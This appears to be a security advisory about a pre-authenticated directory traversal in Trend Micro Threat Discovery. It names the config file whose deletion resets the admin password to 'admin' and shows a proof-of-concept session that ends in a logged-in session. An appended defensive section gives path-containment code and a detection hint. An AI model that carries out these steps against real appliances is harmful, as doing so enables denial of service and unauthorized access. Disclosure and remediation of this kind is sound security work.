#### Summary:

There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. This can result in an attacker causing a DoS or bypassing authentication.

#### Exploitation:

An attacker can use this vulnerability to bypass the authentication by resetting the default password back to 'admin'.

1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf
2. Wait for the server to be rebooted...

It is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby nobody can even log in... (since the md5 hashed pw is stored in the config file).

Notes:
======

- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience)
- No username required!

#### Example:

```
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py
(+) usage: ./poc.py <target> <option [reset][login]>
(+) eg: ./poc.py 172.16.175.123 reset
(+) eg: ./poc.py 172.16.175.123 login
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login
(-) login failed
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset
(+) resetting the default password...
(+) success! now wait for a reboot...
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login
(+) logged in...
(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1
```
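The root cause above is a delete operation that trusts a client-supplied path. As an added example (not code from the advisory, the PoC or the vendor), this is the containment check such a handler needs: canonicalise the joined path, then require it to still lie under a fixed base directory, which rejects `..` segments, absolute paths and symlinks pointing outside. The directory layout, file names and function names are hypothetical; the `igsa.conf` stand-in is a constructed file in a temp directory.

```python
import os
import tempfile
from typing import Optional


def resolve_in_base(base_dir: str, user_path: str) -> Optional[str]:
    """Canonical absolute path for user_path if it stays inside base_dir, else None."""
    base = os.path.realpath(base_dir)
    # Join first, then resolve: '..' segments and symlinks are collapsed before the check,
    # so a link inside base that points outside is caught as well as a raw '../' string.
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath, not str.startswith, so '/srv/data2' is not mistaken for a child of '/srv/data'
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_delete(base_dir: str, user_path: str) -> bool:
    """Delete only regular files that resolve inside base_dir; refuse everything else."""
    target = resolve_in_base(base_dir, user_path)
    if target is None or not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def demo() -> dict:
    """Build a constructed tree and exercise the check; returns what the handler did."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "uploads")          # the only directory the handler may touch
    os.mkdir(base)
    config = os.path.join(root, "igsa.conf")       # constructed stand-in for a config outside base
    inside = os.path.join(base, "report.txt")      # a legitimate, deletable file inside base
    for path in (config, inside):
        with open(path, "w") as fh:
            fh.write("x")
    os.symlink(config, os.path.join(base, "link"))  # symlink inside base escaping to the config
    return {
        "traversal_rejected": safe_delete(base, "../igsa.conf") is False,
        "absolute_rejected": safe_delete(base, config) is False,
        "symlink_rejected": safe_delete(base, "link") is False,
        "config_survived": os.path.exists(config),
        "in_base_deleted": safe_delete(base, "report.txt") and not os.path.exists(inside),
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{'PASS' if ok else 'FAIL'} {check}")
```

Logging the rejected `user_path` from `resolve_in_base` gives a cheap detection signal for traversal attempts against the endpoint.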